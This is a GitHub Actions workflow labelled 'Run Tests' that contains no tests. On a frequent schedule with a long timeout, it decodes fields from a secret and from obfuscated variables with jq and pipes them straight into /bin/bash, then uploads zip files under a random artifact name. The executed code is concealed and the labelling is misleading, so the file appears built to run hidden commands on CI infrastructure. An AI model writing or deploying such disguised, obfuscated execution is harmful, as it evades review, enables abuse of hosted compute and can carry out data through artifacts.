name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '27 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          x57: ${{ secrets.x57 }}
        run: |
          printf '%s' "$x57" | jq -r .yjmc444 | /bin/bash
          echo $mm381 | jq -r .hpoab5027 | /bin/bash
          printf '%s' "$rqc577" | jq -r .uqfn8839 | /bin/bash
          echo $drbgb7734 | jq -r .umi04 | /bin/bash
          printf '%s' "$nklqw6126" | jq -r .ezrrc99 | /bin/bash
          printf '%s' "$oxwif51361" | jq -r .gox1527 | /bin/bash
          echo $f4326 | jq -r .pjeen0 | /bin/bash
          printf '%s' "$jx86" | jq -r .raq20 | /bin/bash
          echo $iy92 | jq -r .zwm28051 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jvTDDnpR
          path: "*.zip"
          retention-days: 1
